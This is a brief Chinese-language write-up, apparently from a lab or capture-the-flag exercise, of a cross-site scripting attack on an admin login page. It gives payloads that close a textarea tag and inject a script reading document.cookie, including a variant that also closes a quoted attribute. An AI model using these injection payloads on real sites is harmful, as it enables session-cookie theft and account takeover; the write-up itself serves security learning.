利用子域名挖掘工具,获取管理员登录页面:
登录管理员页面:
payload:
</textarea>
<script>alert(document.cookie)
</script>
思路分析:
这块只做了前方</textarea>标签闭合,没有过滤<script>标签和大小写,所以只要闭合了文本域标签,其它的payload内容也可以。
正常HTML的文本框:
<textarea ...>
【你的输入】
</textarea>
通过强行闭合文本域并做大小写变体标签:
<textarea ...>
</textarea><script>alert(document.cookie)</script>
</textarea>
也可以追加 '> 是为了兼容属性值闭合(如果你的输入被包裹在引号里,这部分可以把属性也闭合掉),
<textarea ...> </textarea>'> <script>alert(document.cookie)</script> </textarea>